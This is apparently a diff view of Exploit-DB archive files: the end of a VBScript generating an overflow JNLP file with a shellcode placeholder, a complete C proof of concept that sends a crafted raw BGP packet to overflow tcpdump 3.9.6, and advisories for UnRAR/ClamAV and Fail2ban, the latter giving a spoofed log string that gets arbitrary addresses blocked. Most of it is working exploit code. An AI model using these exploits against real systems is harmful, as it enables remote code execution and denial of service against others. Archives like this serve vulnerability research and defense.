' .text:0040629C retn
' .text:0040629C
' .text:0040629C sub_406208 endp
'-----------------------------------------------------------------------------------------------
If WScript.Arguments.Count <> 1 Then
WScript.Echo WScript.ScriptName & " <FileName>"
WScript.Quit
End If
sFileName = WScript.Arguments(0)
On Error Resume Next
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set oFS = oFSO.CreateTextFile(sFileName)
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Create File."
WScript.Quit
End If
c = Chr(&H04)
alphaShellcode = "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII"
oFS.WriteLine "<?xml version=""1.0"" encoding=""utf-8""?>"
oFS.WriteLine "<jnlp spec=""1.0+"" codebase=""http://" & String(12000000, c) & alphaShellcode & String(24, c) & """ href=""test.jnlp"">"
oFS.WriteLine "</jnlp>"
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Write File."
Err.Clear
End If
oFS.Close
Set oFS = Nothing
Set oFSO = Nothing

14
platforms/linux/remote/30291.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/24866/info
Multiple applications using RAR are prone to a NULL-pointer dereference vulnerability.
A successful attack will result in denial-of-service conditions. Attackers may also be able to exploit this issue to execute arbitrary code, but this has not been confirmed.
This issue affects the following:
ClamAV prior to 0.91
'UnRAR' 3.70; other versions may also be vulnerable.
Other applications using the vulnerabile 'UnRAR' utility are affected by this issue. We will update this BID as more information emerges.
http://www.exploit-db.com/sploits/30291.rar

161
platforms/linux/remote/30319.c Executable file
View file

@ -0,0 +1,161 @@
source: http://www.securityfocus.com/bid/24965/info
The 'tcpdump' utility is prone to an integer-underflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary malicious code in the context of the user running the affected application. Failed exploit attempts will likely crash the affected application.
This issue affects tcpdump 3.9.6 and prior versions.
/* tcpdump-bgp.c
*
* tcpdump <= 3.9.6 BGP UPDATE remote overflow POC (lnx)
* by mu-b - July 2007
*
* - Tested on: tcpdump-3.9.6 (.tar.gz)
*
* simple snprintf length integer overflow...
*/
#include <stdio.h>
#include <stdlib.h>
#define __FAVOR_BSD
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#define TH_PUSH 0x08
#define PORT_BGP 179
#define PKT_LEN 512
#define BGPTYPE_MP_REACH_NLRI 14
#define AFNUM_L2VPN 196
#define SAFNUM_VPNUNICAST 128
static unsigned short
ip_sum (const unsigned short *ptr, int len)
{
register int sum = 0;
while (len > 1)
{
sum += *ptr++;
len -= 2;
}
if (len == 1)
sum += *((unsigned char *) ptr);
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (~sum);
}
int
main (void)
{
int raw_fd, opt_val, *popt_val;
char buf[4096], *ptr;
struct ip *iph;
struct tcphdr *tcph;
struct sockaddr_in sin;
printf ("tcpdump <= 3.9.6 BGP UPDATE remote overflow POC\n"
"by mu-b <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if ((raw_fd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP)) < 0)
{
perror ("socket ()");
exit (EXIT_FAILURE);
}
opt_val = 1;
popt_val = &opt_val;
if (setsockopt (raw_fd, IPPROTO_IP, IP_HDRINCL, popt_val, sizeof opt_val) < 0)
{
perror ("setsockopt ()");
exit (EXIT_FAILURE);
}
sin.sin_family = AF_INET;
sin.sin_port = htons (PORT_BGP);
sin.sin_addr.s_addr = inet_addr ("127.0.0.1");
memset (buf, 0, 4096);
iph = (struct ip *) buf;
iph->ip_hl = 5;
iph->ip_v = 4;
iph->ip_tos = 0;
iph->ip_len = htons (sizeof (struct ip) + sizeof (struct tcphdr) + PKT_LEN);
iph->ip_id = htonl (54321);
iph->ip_off = 0;
iph->ip_ttl = 255;
iph->ip_p = 6;
iph->ip_sum = 0;
iph->ip_src.s_addr = inet_addr ("1.2.3.4");
iph->ip_dst.s_addr = sin.sin_addr.s_addr;
iph->ip_sum = ip_sum ((unsigned short *) buf, sizeof (struct ip));
tcph = (struct tcphdr *) (buf + sizeof (struct ip));
tcph->th_sport = htons (65535);
tcph->th_dport = htons (PORT_BGP);
tcph->th_seq = rand ();
tcph->th_ack = 0;
tcph->th_x2 = 0;
tcph->th_off = sizeof (struct tcphdr) / 4;
tcph->th_flags = TH_PUSH;
tcph->th_win = htonl (65535);
tcph->th_sum = 0;
tcph->th_urp = 0;
ptr = buf + sizeof (struct ip) + sizeof (struct tcphdr);
memset (ptr, 0xFF, 16); /* marker */
ptr += 16;
*ptr++ = 0x02; /* length */
*ptr++ = 0x00;
*ptr++ = 0x02; /* type = BGP_UPDATE */
*ptr++ = 0x00; /* length */
*ptr++ = 0x00;
*ptr++ = 0x00; /* length */
*ptr++ = 0xFF;
*ptr++ = 0x00; /* attr flags */
*ptr++ = BGPTYPE_MP_REACH_NLRI; /* attr type */
*ptr++ = 0xFF; /* attr length */
*ptr++ = (AFNUM_L2VPN << 8) & 0xFF;
*ptr++ = AFNUM_L2VPN & 0xFF;
*ptr++ = SAFNUM_VPNUNICAST;
*ptr++ = 0x00; /* Next-HOP */
*ptr++ = 0x00; /* SNPA */
/* decode_labeled_vpn_l2 */
*ptr++ = 0xFF; /* tlen = plen */
*ptr++ = 0xFF;
memset (ptr, 0xFF, 15); /* marker */
ptr += 15;
*ptr++ = 0x01; /* type */
*ptr++ = 0x02; /* len */
*ptr++ = 0x50;
memset (ptr, 0x41, PKT_LEN);
if (sendto (raw_fd, buf, sizeof (struct ip) + sizeof (struct tcphdr) + PKT_LEN, 0,
(struct sockaddr *) &sin, sizeof (sin)) < 0)
{
perror ("sendto ()");
exit (EXIT_FAILURE);
}
return (EXIT_SUCCESS);
}

14
platforms/linux/remote/30430.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/25117/info
Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages.
Successfully exploiting this issue allows remote attackers to add arbitrary IP addresses to the block list used by the application. This allows attackers to deny further network access to arbitrary IP addresses, denying service to legitimate users.
Fail2ban 0.8.0 and prior versions are vulnerable to this issue.
This issue may be demonstrated by connecting to an SSH server with 'nc', and sending the following string:
ROOT LOGIN REFUSED hi FROM 1.2.3.4
where '1.2.3.4' is an IP address to be blocked.

Some files were not shown because too many files have changed in this diff Show more